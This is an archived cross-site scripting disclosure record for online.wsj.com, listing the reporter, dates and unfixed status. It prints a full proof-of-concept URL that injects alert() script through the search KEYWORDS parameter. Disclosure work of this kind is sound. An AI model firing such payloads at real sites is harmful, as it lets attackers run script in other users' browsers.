Security researcher gamr, has submitted on 21/08/2008 a cross-site-scripting (XSS) vulnerability affecting online.wsj.com, which at the time of submission ranked 329 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/07/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 21/08/2008 |
Date published: 13/07/2009 |
Fixed? Mail us! | Status: UNFIXED |
Author: gamr |
Domain: online.wsj.com |
Category: XSS |
Pagerank: 329 |
URL: http://online.wsj.com/public/search/page/3_0466.html?KEYWORDS=%27;alert(String.fromCharCode(72,65,67 ,75,73,78,71,45,77,65,83,84,69,82,83,46,78,69,84))//\%27;alert(String.fromCharCode(72,65,67,75,73,78 ,71,45,77,65,83,84,69,82,83,46,78,69,84))//%22;alert(String.fromCharCode(72,65,67,75,73,78,71,45,77, 65,83,84,69,82,83,46,78,69,84))//\%22;alert(String.fromCharCode(72,65,67,75,73,78,71,45,77,65,83,84, 69,82,83,46,78,69,84,49))//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert(String.fromCharCode(72,65 ,67,75,73,78,71,45,77,65,83,84,69,82,83,46,78,69,84))%3C/SCRIPT%3E |
Click here to view the mirror
|
|